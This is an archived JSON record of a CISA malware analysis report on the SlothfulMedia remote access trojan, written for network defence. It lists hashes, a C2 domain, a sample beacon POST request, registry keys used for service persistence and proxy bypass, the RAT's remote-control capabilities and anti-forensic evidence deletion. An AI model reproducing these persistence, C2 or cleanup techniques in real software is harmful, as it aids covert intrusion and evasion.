{
	"id": "c48bab4f-ba40-46d8-8e09-e56456631c0b",
	"created_at": "2026-04-06T00:08:34.299756Z",
	"updated_at": "2026-04-10T03:20:43.601402Z",
	"deleted_at": null,
	"sha1_hash": "fa45f3b24634cd6b910f773692c97e3c3aa492d2",
	"title": "MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 77655,
	"plain_text": "MAR-10303705-1.v1 – Remote Access Trojan: SLOTHFULMEDIA |\r\nCISA\r\nPublished: 2020-10-01 · Archived: 2026-04-05 13:02:27 UTC\r\nNotification\r\nThis report is provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not\r\nprovide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial\r\nproduct or service referenced in this bulletin or otherwise.\r\nThis document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries\r\nminimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to\r\nstandard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the\r\nTraffic Light Protocol (TLP), see http://www.us-cert.gov/tlp.\r\nSummary\r\nDescription\r\nThis Malware Analysis Report (MAR) is the result of analytic efforts between the Cybersecurity and Infrastructure Security\r\nAgency (CISA) and the Cyber National Mission Force (CNMF). The malware variant, known as SlothfulMedia, has been\r\nused by a sophisticated cyber actor. CISA and CNMF are distributing this MAR to enable network defense and reduced\r\nexposure to malicious activity. This MAR includes suggested response actions and recommended mitigation techniques.\r\nThe sample is a dropper, which deploys two files when executed. The first is a remote access tool (RAT) named\r\n‘mediaplayer.exe’’, which is designed for command and control (C2) of victim computer systems. Analysis has determined\r\nthe RAT has the ability to terminate processes, run arbitrary commands, take screen shots, modify the registry, and modify\r\nfiles on victim machines. 
It appears to communicate with its C2 controller via Hypertext Transfer Protocol (HTTP) over\r\nTransmission Control Protocol (TCP).\r\nThe second file has a random five-character name and deletes the dropper once the RAT has persistence. Persistence is\r\nachieved through the creation of a service named “Task Frame”, which ensures the RAT is loaded after a reboot.\r\nUsers or administrators should flag activity associated with the malware and report the activity to the CISA or the FBI Cyber\r\nWatch (CyWatch), and give the activity the highest priority for enhanced mitigation. For more information on malicious\r\ncyber activity, please visit https[:]//www[.]us-cert.gov.\r\nFor a downloadable copy of IOCs, see MAR-10303705-1.v1.stix.\r\nSubmitted Files (1)\r\n64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273 (448838B2A60484EE78C2198F2C0C9C...)\r\nAdditional Files (2)\r\n4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa (wHPEO.exe)\r\n927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae (mediaplayer.exe)\r\nDomains (1)\r\nsdvro.net\r\nFindings\r\n64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nTags\r\nbot, dropper, information-stealer, keylogger, remote-access-trojan, trojan\r\nDetails\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a\r\nPage 1 of 9\n\nName 448838B2A60484EE78C2198F2C0C9C85\r\nSize 117760 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 448838b2a60484ee78c2198f2c0c9c85\r\nSHA1 f2c43a01cabaa694228f5354ea8c6bcf3b7a49b3\r\nSHA256 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nSHA512 9e532af06e5f4764529211e8c5c749baa7b01c72f11b603218c3c08d70cf1e732f8d9d81ec257ca247aaa96d1502150a2f402b1b3914780b6\r\nssdeep 3072:PGA5q4Xmco7ciR7BiU+q+TESaiQ4RHpxJdW:O0qtUYBiU+qRiQy\r\nEntropy 6.156007\r\nAntivirus\r\nBitDefender Dropped:Generic.Malware.Fdldg.B04B59A4\r\nComodo TrojWare.Win32.ButeRat.PP\r\nEmsisoft Dropped:Generic.Malware.Fdldg.B04B59A4 (B)\r\nIkarus 
Trojan-PWS.Win32.Zbot\r\nLavasoft Dropped:Generic.Malware.Fdldg.B04B59A4\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2019-04-29 10:19:52-04:00\r\nImport Hash 3e935061f369e95ac9d62c7cbdf4acf1\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\n502dceaf120f990b5118230438102568 header 1024 2.390635\r\n1ec70611505f1cebfc859820b45b6cc3 .text 39424 6.506891\r\ndfebe81d71d56100ac07b85046f07b77 .rdata 12288 4.988754\r\n06f5259aac1a4462eaf12334dc0e8daf .data 59392 6.004077\r\nc2d6c399730fd89b16d2b6d6cec5e393 .rsrc 512 5.105006\r\n1587227ab56ecfb9c5b85aaf24d98454 .reloc 5120 3.993742\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n64d78eec46... Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\n64d78eec46... Connected_To sdvro.net\r\n64d78eec46... Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nDescription\r\nThis file is a 32-bit Windows executable. When executed, it will drop a file called 'mediaplayer.exe'\r\n(927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) into the path %AppData%\\Media\\. A link file\r\ncalled 'media.lnk' is also placed in this path. A third file is placed in the path %TEMP% and is given a five character random\r\nname with an '.exe' extension, e.g. 'wHPEO.exe'\r\n(4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa). 
This file is created with a 'hidden' attribute to\r\nensure that it is not visible to the user.\r\nNext, the program will create a service on the system called \"TaskFrame\" with the following parameters:\r\n--- Begin Service Parameters ---\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    Type: 272\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    Start: 2\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    ErrorControl: 1\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    ImagePath: C:\\Users\\\r\n\u003cuser\u003e\\AppData\\Roaming\\Media\\mediaplayer.exe\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    DisplayName: TaskFrame\r\nHKLM\\System\\CurrentControlSet\\Services\\TaskFrame    ObjectName: LocalSystem\r\n--- End Service Parameters ---\r\nThis service is used to create persistence on the system and is designed to start the 'mediaplayer.exe'\r\n(927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae) program each time the system is started.\r\nNext, the program will collect system information to send to the command and control (C2). A unique identifier is created\r\nand sent in a POST request along with a Unix timestamp of the time of infection to the domain www[.]sdvro.net.\r\nConnection attempts are made via both HTTP and HTTPS. 
The following is a sample of the POST request:\r\n--- Begin POST Request ---\r\nPOST /v?m=u2fssrqh8cl0\u0026i=1598908417 HTTP/1.1\r\nAccept: application/octet-stream,application/xhtml\r\nContent-Length: 436\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75\r\nHost: www[.]sdvro.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n..D......!F.1y^.4.\u0026....{ ..f]..Fz...;..H.\\L`p..$.H..0A.A(An_8...;..$yH.t..4H...3..K.QvRkX.c..|r r=..V.F.....Hc.H......H.\r\n\u003c..tfH....@..uU.@.....uL..D.=o..l!'..D$hH.\u0026.H.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t..gH...3..f..K..-.\r\n..|    \r\n=../.:.....Hc.H......H.\u003c..tfH....@..uU.r.0.0.[L..t.\r\no..2!v..D\r\nhy...p.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t$.WH..03..K..K(...3..|$\r\n;=..........Hc.H......H.:..tWH....@..uU.@.....uL..D.\r\n--- End POST Request ---\r\nThe domain did not resolve to an IP address at the time of analysis. Note: The malware uses the fixed User-Agent string,\r\n\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75\" in its\r\ncommunication.\r\nThe following notable strings were found in unreferenced data within the file. The purpose of the strings could not be\r\ndetermined. 
The strings are not used by the code.\r\n--- Begin Notable Strings ---\r\nC:\\Users\\david\\AppData\\Roaming\\Media\\mediaplayer.exe\r\ndavid-pc\r\n--- End Notable Strings ---\r\nsdvro.net\r\nTags\r\ncommand-and-control\r\nPorts\r\n80 TCP\r\n443 TCP\r\nHTTP Sessions\r\nPOST /v?m=u2fssrqh8cl0\u0026i=1598908417 HTTP/1.1\r\nAccept: application/octet-stream,application/xhtml\r\nContent-Length: 436\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)\r\nChrome/68.0.3440.75\r\nHost: www.sdvro.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n..D......!F.1y^.4.\u0026....{ ..f]..Fz...;..H.\\L`p..$.H..0A.A(An_8...;..$yH.t..4H...3..K.QvRkX.c..|r r=..V.F.....Hc.H......H.\r\n\u003c..tfH....@..uU.@.....uL..D.=o..l!'..D$hH.\u0026.H.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t..gH...3..f..K..-.\r\n..|    \r\n=../.:.....Hc.H......H.\u003c..tfH....@..uU.r.0.0.[L..t.\r\no..2!v..D\r\nhy...p.f..H.f(..F..n.H..H.\\$`H.l$pH..0A_A]A\\_^...H.\\$.H.t$.WH..03..K..K(...3..|$\r\n;=..........Hc.H......H.:..tWH....@..uU.@.....uL..D.\r\nWhois\r\nDomain Name: SDVRO.NET\r\nRegistry Domain ID: 2371496862_DOMAIN_NET-VRSN\r\nRegistrar WHOIS Server: whois.west263.com\r\nRegistrar URL: http://www.west.cn/\r\nUpdated Date: 2020-03-31T08:26:43Z\r\nCreation Date: 2019-03-21T07:42:43Z\r\nRegistry Expiry Date: 2021-03-21T07:42:43Z\r\nRegistrar: Chengdu West Dimension Digital Technology Co., Ltd.\r\nRegistrar IANA ID: 1556\r\nRegistrar Abuse Contact Email:\r\nRegistrar Abuse Contact Phone:\r\nDomain Status: ok https://icann.org/epp#ok\r\nName Server: NS3.MYHOSTADMIN.NET\r\nName Server: NS4.MYHOSTADMIN.NET\r\nDNSSEC: unsigned\r\nDomain Name: sdvro.net                \r\nRegistry Domain ID: whois protect\r\nRegistrar WHOIS Server: whois.west.cn\r\nRegistrar URL: www.west.cn\r\nUpdated Date: 2019-03-21T07:42:42.0Z\r\nCreation Date: 2019-03-21T07:42:42.0Z\r\nRegistrar 
Registration Expiration Date: 2021-03-21T07:42:42.0Z\r\nRegistrar: Chengdu west dimension digital technology Co., LTD\r\nRegistrar IANA ID: 1556\r\nReseller:\r\nDomain Status: ok http://www.icann.org/epp#ok\r\nRegistry Registrant ID: Not Available From Registry\r\nRegistrant Name: REDACTED FOR PRIVACY\r\nRegistrant Organization: REDACTED FOR PRIVACY\r\nRegistrant Street: REDACTED FOR PRIVACY\r\nRegistrant City: Chengdu\r\nRegistrant State/Province: Sichuan\r\nRegistrant Postal Code: REDACTED FOR PRIVACY\r\nRegistrant Country: CN\r\nRegistrant Phone: REDACTED FOR PRIVACY\r\nRegistrant Phone Ext:\r\nRegistrant Fax: REDACTED FOR PRIVACY\r\nRegistrant Fax Ext:\r\nRegistrant Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net\r\nRegistry Admin ID: Not Available From Registry\r\nAdmin Name: REDACTED FOR PRIVACY\r\nAdmin Organization: REDACTED FOR PRIVACY\r\nAdmin Street: REDACTED FOR PRIVACY\r\nAdmin City: Chengdu\r\nAdmin State/Province: Sichuan\r\nAdmin Postal Code: REDACTED FOR PRIVACY\r\nAdmin Country: CN\r\nAdmin Phone: REDACTED FOR PRIVACY\r\nAdmin Phone Ext:\r\nAdmin Fax: REDACTED FOR PRIVACY\r\nAdmin Fax Ext:\r\nAdmin Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net\r\nRegistry Tech ID: Not Available From Registry\r\nTech Name: REDACTED FOR PRIVACY\r\nTech Organization: REDACTED FOR PRIVACY\r\nTech Street: REDACTED FOR PRIVACY\r\nTech City: Chengdu\r\nTech State/Province: Sichuan\r\nTech Postal Code: REDACTED FOR PRIVACY\r\nTech Country: CN\r\nTech Phone: REDACTED FOR PRIVACY\r\nTech Phone Ext:\r\nTech Fax: REDACTED FOR PRIVACY\r\nTech Fax Ext:\r\nTech Email: link at https://www.west.cn/web/whoisform?domain=sdvro.net\r\nName Server: ns3.myhostadmin.net\r\nName Server: ns4.myhostadmin.net\r\nDNSSEC: signedDelegation\r\nRelationships\r\nsdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nDescription\r\nThis domain did 
not resolve to an IP address at the time of analysis.\r\n927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nTags\r\nremote-access-trojan\r\nDetails\r\nName mediaplayer.exe\r\nSize 46080 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 9f23bd89694b66d8a67bb18434da4ee8\r\nSHA1 db8c6ea90b1be5aa560bfbe5a34577eb284243af\r\nSHA256 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nSHA512 72e95a90dc8ee2fd69b26665e88d19b1d36527fe8bbc03e252d4be925cf4acae20a3155dcd7caa50daf6e16d201a16822d77356c91654a6e4\r\nssdeep 768:NRw4PZcMc8ie9+dZL6DSKdzxSGyCevVcxjw3e3PxKfRXAxo3vhxfFORpa9sxw:NRwaBiU+dZODSKeGHSaxjw3QUfRH/hx7\r\nEntropy 6.320571\r\nAntivirus\r\nBitDefender Gen:Variant.Fugrafa.6689\r\nEmsisoft Gen:Variant.Fugrafa.6689 (B)\r\nLavasoft Gen:Variant.Fugrafa.6689\r\nSymantec Heur.AdvML.B\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2019-04-29 10:18:34-04:00\r\nImport Hash db182005fc9fccab434ec0764ea5a244\r\nCompany Name Tdl Corporation\r\nFile Description Local Security Process\r\nInternal Name None\r\nLegal Copyright Copyright (C) 2018\r\nOriginal Filename None\r\nProduct Name Tdl Corporation\r\nProduct Version 1.0.0.1\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nfaf4cd402ffdb84551c382ea45f2f893 header 1024 2.514929\r\n7e3095c827af75a349f3c206925932cd .text 31232 6.493665\r\n614ccbacb5de6dae94b6af93aa5a83fc .rdata 8192 5.232371\r\n543ffbd535401feb9f37c585d9f161f3 .data 1536 4.679413\r\n7c1584feb039309d7a4307c39adaa54f .rsrc 1024 2.333786\r\n79345fb74e56359cd6eb957ceb52e0ab .reloc 3072 4.519356\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n927d945476... 
Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nDescription\r\nThis file is a 32-bit Windows executable file that is dropped and executed by 448838B2A60484EE78C2198F2C0C9C85.\r\nThe file is called 'mediaplayer.exe'. When executed, it will look for a file called 'Junk9' and will attempt to delete it. The file\r\n'Junk9' was not available for analysis. Next, it will take a screenshot of the user's desktop and name it 'Filter3.jpg' and store\r\nthis in the local directory. The program then looks for a service called 'TaskFrame' and attempts to start it. The 'TaskFrame'\r\nservice is able to delete, add, or modify registry keys, and start and stop a keylogger program on the system. If the\r\n'TaskFrame' service is already installed and running, the program will terminate.\r\nThe malware will create a mutex on the system called 'Global\\mukimukix'. The program changes the proxy configuration of\r\nthe system with the following registry modifications:\r\n--- Begin Registry Modification ---\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\r\nName: ProxyBypass    Value: 1\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\r\nName: IntranetName    Value: 1\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\r\nName: UNCAsIntranet    Value: 1\r\n--- End Registry Modification ---\r\nThe program collects the computer name, user name, OS version, adapter information, memory usage, and logical drives for\r\nthe system. This information is concatenated into a string that is hashed and sent as part of the initial POST request to the\r\nC2. The program will expect to receive a '200 OK' response from the C2 before it begins transmission. If it receives a '501\r\nError' the program sleeps for three seconds and attempts another connection. 
If the initial connection to the C2 is successful,\r\nthe program will await a command. The program is capable of executing the following tasks from commands issued by the\r\nC2:\r\n--- Begin Program Capabilities ---\r\n1. Create, Write, and Delete files.\r\n2. Open a Command Line.\r\n3. Move Files.\r\n4. Enumerate Open Ports.\r\n5. Enumerate Drives.\r\n6. Enumerate Processes by ID, Name, or Privileges.\r\n7. Start and Stop Processes.\r\n8. Enumerate Files and Directories.\r\n9. Open a Named Pipe and Send and Receive Data.\r\n10. Take Screenshots.\r\n11. Inject into User Processes.\r\n12. Enumerate Services.\r\n13. Start/Stop Services.\r\n14. Modify the Registry.\r\n15. Open/Close TCP and UDP Sessions.\r\n--- End Program Capabilities ---\r\nThe program will also look for the following paths: \\SetupUi, \\AppIni, and \\ExtInfo. The purpose for this search could not\r\nbe determined.\r\n4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\nTags\r\nremote-access-trojan\r\nDetails\r\nName wHPEO.exe\r\nSize 7168 bytes\r\nType PE32 executable (GUI) Intel 80386, for MS Windows\r\nMD5 92a40c64cea4a87de1c24437612f2e0f\r\nSHA1 f52f0685a72d6a8f3e119ce92b7cf1c2c6a83bb9\r\nSHA256 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\nSHA512 d0714d09dcac070eb8d0971e953ce0c0382658d5682982a8045dcf29da9a729be57dc7d60c4e18f1833966f6c6584e9a883871eef8d1c9f9d\r\nssdeep 192:DcTrBTVdZzgW+mpWpc9aThFJJRmqSA9iu:c7EmpWpc9aThFVviu\r\nEntropy 5.395407\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nPE Metadata\r\nCompile Date 2017-12-04 08:14:24-05:00\r\nImport Hash 6ab19ee53c87a04ccb965f5f658b717a\r\nPE Sections\r\nMD5 Name Raw Size Entropy\r\nd6cd352d657372b25707fed98bc3bd0b header 1024 2.379332\r\nc036d2e814490871e54dd84e8117e044 .text 2560 5.788179\r\n2f2819452977bcfd6dcac4389a2cd193 .rdata 1536 
4.849405\r\nafadce14c7f045a0390158515331a054 .data 512 1.342806\r\n554d0cedd69e96ee00c8324ce4da604c .rsrc 1024 5.194460\r\ned7fec6ad28b233df4676dad7f306c3c .reloc 512 4.741130\r\nPackers/Compilers/Cryptors\r\nRelationships\r\n4186b5beb5... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nDescription\r\nThis artifact is a 32-bit Windows executable that is dropped by 448838B2A60484EE78C2198F2C0C9C85. This program\r\nhas some anti-forensic capability and is designed to clear indicators of compromise (IOCs) from the system. The program\r\nfirst verifies that the service 'TaskFrame' is running, then adds the following key to the registry:\r\n--- Begin Registry Modification ---\r\nHKLM\\System\\CurrentControlSet\\Control\\SessionManager\\PendingFileRenameOperations\r\nData: \\??\\C:\\Users\\\u003cuser\u003e\\AppData\\Local\\Temp\\wHPEO.exe\r\n--- End Registry Modification ---\r\nThis modification ensures that the file is deleted with the next system restart. The program will also delete the user's\r\n'index.dat' file, thus removing the user’s recent Internet history from the system.\r\nRelationship Summary\r\n64d78eec46... Dropped 4186b5beb576aa611b84cbe95781c9dccca6762f260ac7a48f6727840fc057fa\r\n64d78eec46... Connected_To sdvro.net\r\n64d78eec46... Dropped 927d945476191a3523884f4c0784fb71c16b7738bd7f2abd1e3a198af403f0ae\r\nsdvro.net Connected_From 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\n927d945476... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\n4186b5beb5... Dropped_By 64d78eec46c9ddd4b9a366de62ba0f2813267dc4393bc79e4c9a51a9bb7e6273\r\nRecommendations\r\nCISA recommends that users and administrators consider using the following best practices to strengthen the security\r\nposture of their organization's systems. 
Any configuration changes should be reviewed by system owners and administrators\r\nprior to implementation to avoid unwanted impacts.\r\nMaintain up-to-date antivirus signatures and engines.\r\nKeep operating system patches up-to-date.\r\nDisable File and Printer sharing services. If these services are required, use strong passwords or Active Directory\r\nauthentication.\r\nRestrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local\r\nadministrators group unless required.\r\nEnforce a strong password policy and implement regular password changes.\r\nExercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be\r\nknown.\r\nEnable a personal firewall on agency workstations, configured to deny unsolicited connection requests.\r\nDisable unnecessary services on agency workstations and servers.\r\nScan for and remove suspicious e-mail attachments; ensure the scanned attachment is its \"true file type\" (i.e., the\r\nextension matches the file header).\r\nMonitor users' web browsing habits; restrict access to sites with unfavorable content.\r\nExercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).\r\nScan all software downloaded from the Internet prior to executing.\r\nMaintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).\r\nAdditional information on malware incident prevention and handling can be found in National Institute of Standards and\r\nTechnology (NIST) Special Publication 800-83, \"Guide to Malware Incident Prevention \u0026 Handling for Desktops and\r\nLaptops\".\r\nContact Information\r\nDocument FAQ\r\nWhat is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in\r\na timely manner. In most instances this report will provide initial indicators for computer and network defense. 
To request\r\nadditional analysis, please contact CISA and provide information regarding the level of desired analysis.\r\nWhat is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware\r\nanalysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide\r\ninformation regarding the level of desired analysis.\r\nCan I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to\r\nthis document should be directed to the CISA at 1-844-Say-CISA or CISA Central.\r\nCan I submit malware to CISA? Malware samples can be submitted via three methods:\r\nWeb: https://malware.us-cert.gov\r\nE-Mail: submit@malware.us-cert.gov\r\nFTP: ftp.malware.us-cert.gov (anonymous)\r\nCISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software\r\nvulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.\r\nSource: https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://us-cert.cisa.gov/ncas/analysis-reports/ar20-275a"
	],
	"report_names": [
		"ar20-275a"
	],
	"threat_actors": [],
	"ts_created_at": 1775434114,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fa45f3b24634cd6b910f773692c97e3c3aa492d2.pdf",
		"text": "https://archive.orkl.eu/fa45f3b24634cd6b910f773692c97e3c3aa492d2.txt",
		"img": "https://archive.orkl.eu/fa45f3b24634cd6b910f773692c97e3c3aa492d2.jpg"
	}
}